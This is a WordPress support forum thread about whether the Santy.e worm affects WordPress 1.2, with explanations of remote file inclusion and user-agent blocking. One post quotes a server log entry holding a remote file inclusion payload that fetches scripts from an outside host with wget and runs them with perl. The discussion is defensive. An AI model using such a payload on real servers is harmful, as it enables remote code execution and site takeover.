I know I should and well I would move on to 1.2.2 WordPress. Still I wanted to check if WP 1.2 is affected by this worm or not!
Santy.e Threat (7 posts)
-
OperaManiac
Posted 7 years ago # -
Wybe
Posted 7 years ago #i believe that was that worm "defacing" websites right? it searches trough google (google´s already taken actions) for viewtopic.php, something phpBB uses, not WordPress. I don´t believe it is aimed at wordpress at all.
-
Ryan Boren
Posted 7 years ago #It looks like Santy.e/Spyki.b relies on remote file inclusion vulnerabilities. WordPress does not have this problem. We do not pass user input to require or include.
-
Etanisla
Posted 7 years ago #So then, I shouldn't worry about entries like this in my logs?
http://carelessthought.com/index.php?p=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt -
Posted 7 years ago #'p' is run through intval(). That URI will evaulate to 0. Nothing to worry about.
-
jonimueller
Posted 7 years ago #Etanisla, are you having bandwidth issues as well? There is another thread here that discusses a fix via your .htaccess file. Search using keyword hijacked and you should find the thread. I'll try to post it here if I find it also.
Or you can just visit my blog to read the entry about my bandwidth issues this past weekend and there is a link to a solution there.
Good luck!
-
Posted 7 years ago #jonimueller, blocking the user-agent "LWP", and "lwp" has blocked most of the redirection attempts. I saw that common property among most of the requests that was trying that redirection trick. So my bandwidth is safe.
I don't have a "posts paged" option (1.2.1) so I'll hack it later when I get home.
Thanks.
Topic Closed
This topic has been closed to new replies.
